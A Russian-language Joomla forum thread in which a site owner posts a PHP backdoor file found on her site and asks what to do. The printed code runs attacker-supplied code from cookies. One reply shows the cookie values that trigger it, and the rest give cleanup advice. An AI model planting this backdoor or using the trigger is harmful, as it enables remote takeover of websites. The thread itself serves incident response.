0 Пользователей и 1 Гость просматривают эту тему.
  • 14 Ответов
  • 904 Просмотров
*

katerrinka

  • Новичок
  • 7
  • 0
2 файла:

administrator/components/weklz.php


<?php
class PluginJoomla {
 public function __construct() {
  $jq = @$_COOKIE['41bjGEDj3'];
  if ($jq) {
   $option = $jq(@$_COOKIE['41bjGEDj2']);
   $au=$jq(@$_COOKIE['41bjGEDj1']);
   $option("/438/e",$au,438);
  } else {
   phpinfo();die;
  }
 }
}
$content = new PluginJoomla;

Что можно с ними сделать? удалить? закомментировать?
*

dmitry_stas

  • Профи
  • 10032
  • 952
Re: нашла вирусы, что с ними делать?
« Ответ #1 : 07.02.2016, 18:14:16 »
делайте что угодно, главное поймите, что это не решит вашу проблему. вам надо найти и устранить дыру через которую они к вам попали.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

katerrinka

  • Новичок
  • 7
  • 0
Re: нашла вирусы, что с ними делать?
« Ответ #2 : 07.02.2016, 18:25:24 »
Вот второй файл насколько я поняла из статьи на хабре и есть шелл:

Спойлер
[свернуть]
« Последнее редактирование: 07.02.2016, 21:52:00 от flyingspook »
*

katerrinka

  • Новичок
  • 7
  • 0
Re: нашла вирусы, что с ними делать?
« Ответ #3 : 07.02.2016, 18:33:07 »
Дальше планирую удалить всякие модули типо обратной связи. Закрыть доступ в админку и доступ по ftp.
*

dmitry_stas

  • Профи
  • 10032
  • 952
Re: нашла вирусы, что с ними делать?
« Ответ #4 : 07.02.2016, 18:55:46 »
Дальше планирую удалить всякие модули типо обратной связи.
почему именно их?
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

vipiusss

  • Профи
  • 5618
  • 322
  • Круглая ава-зло!
Re: нашла вирусы, что с ними делать?
« Ответ #5 : 07.02.2016, 19:03:04 »
почему именно их?
Видно что под горячую руку попалось или под женскую логику :)

///

Катеринка:вам стоило бы, как вам указали выше, понять, откуда это и возможно в шаблоне/расширении изначально было, а не заразили вас!

И может и дырка в коде или иная уязвимость.
А вы сразу, как хирурги-лижбы резать.
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

flyingspook

  • Moderator
  • 3620
  • 236
Re: нашла вирусы, что с ними делать?
« Ответ #6 : 07.02.2016, 21:53:02 »
Вам чистить и обновлять сайт с расширениями надо.
*

voland

  • Профи
  • 9511
  • 422
  • Эта строка съедает место на вашем мониторе
Re: нашла вирусы, что с ними делать?
« Ответ #7 : 07.02.2016, 21:55:43 »
Можно их на 5 минут в микроволновку и потом соусом чили полить - будет вкусно.
*

ChaosHead

  • Профи
  • 4744
  • 398
Re: нашла вирусы, что с ними делать?
« Ответ #8 : 08.02.2016, 00:01:39 »
Вирусы - это программы, которые сами распространяются, а у вас тут просто кто-то ходит через заднюю дверь и "хозяйничает" с вашим сайтом.
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Re: нашла вирусы, что с ними делать?
« Ответ #9 : 08.02.2016, 09:52:30 »
2 файла:

administrator/components/weklz.php


<?php
class PluginJoomla {
 public function __construct() {
  $jq = @$_COOKIE['41bjGEDj3'];
  if ($jq) {
   $option = $jq(@$_COOKIE['41bjGEDj2']);
   $au=$jq(@$_COOKIE['41bjGEDj1']);
   $option("/438/e",$au,438);
  } else {
   phpinfo();die;
  }
 }
}
$content = new PluginJoomla;

Что можно с ними сделать? удалить? закомментировать?

в куках примерно так:
Цитировать
41bjGEDj3=assert; 41bjGEDj1=echo "ТУТ БЫЛ ВАСЯ";
для болие коректного кода в базе 64 засунте))
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

dmitry_stas

  • Профи
  • 10032
  • 952
Re: нашла вирусы, что с ними делать?
« Ответ #10 : 08.02.2016, 11:11:19 »
в куках примерно так:

мне почему то кажется что на вопрос

Что можно с ними сделать?

ожидался другой ответ  ;D
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

CCTRRoman

  • Осваиваюсь на форуме
  • 116
  • 3
Re: нашла вирусы, что с ними делать?
« Ответ #11 : 08.02.2016, 12:30:54 »
Попробуйте
1. https://www.revisium.com/ai/
или
2. https://www.reg.ru/support/hosting-i-servery/servery-vps/reshenie-problem-raboty-vps/kak-proverit-server-na-nalichie-virusov
или
3. https://www.rsjoomla.com/joomla-extensions/joomla-security.html

ну а затем, после удаления всего лишнего, поменять все пароли на всё,
обновить всё на сайте до последних версий
и не пользоваться варезными расширениями :-)
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Re: нашла вирусы, что с ними делать?
« Ответ #12 : 08.02.2016, 20:11:08 »
или
3. https://www.rsjoomla.com/joomla-extensions/joomla-security.html

ну а затем, после удаления всего лишнего, поменять все пароли на всё,
обновить всё на сайте до последних версий
и не пользоваться варезными расширениями :-)
Крайне не рекомендую этот сервис
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Lentochka

  • Осваиваюсь на форуме
  • 43
  • 7
Re: нашла вирусы, что с ними делать?
« Ответ #13 : 09.02.2016, 09:44:22 »
Крайне не рекомендую этот сервис
А что с ним не так?
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Re: нашла вирусы, что с ними делать?
« Ответ #14 : 09.02.2016, 13:13:33 »
А что с ним не так?
Если вы что то понимаете в природе уязвимостей, и имеете четкое представление к чему это ведет, то вот пост https://forum.antichat.ru/threads/50600/page-16#post-3923889
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Проверка на вирусы: как не удалить нужный файл

Автор Vosblog

Ответов: 4
Просмотров: 164
Последний ответ 05.09.2017, 23:12:57
от ELLE
Вирус на сайте, редирект, что делать как лечить!

Автор flyingspook

Ответов: 790
Просмотров: 219159
Последний ответ 23.05.2017, 23:22:56
от AlekVolsk
Обноружен Swf.Exploit.CVE_2016_0995-1 на сайте, что делать?

Автор Elimelech

Ответов: 1
Просмотров: 259
Последний ответ 29.04.2017, 11:26:44
от ProtectYourSite
Взлом или Joomla должна штатно такое делать?

Автор alpeichik

Ответов: 19
Просмотров: 868
Последний ответ 04.02.2017, 19:48:38
от flyingspook
После взлома сайта вирусы не удаляются

Автор AndreySm

Ответов: 11
Просмотров: 468
Последний ответ 20.06.2016, 15:05:47
от AndreySm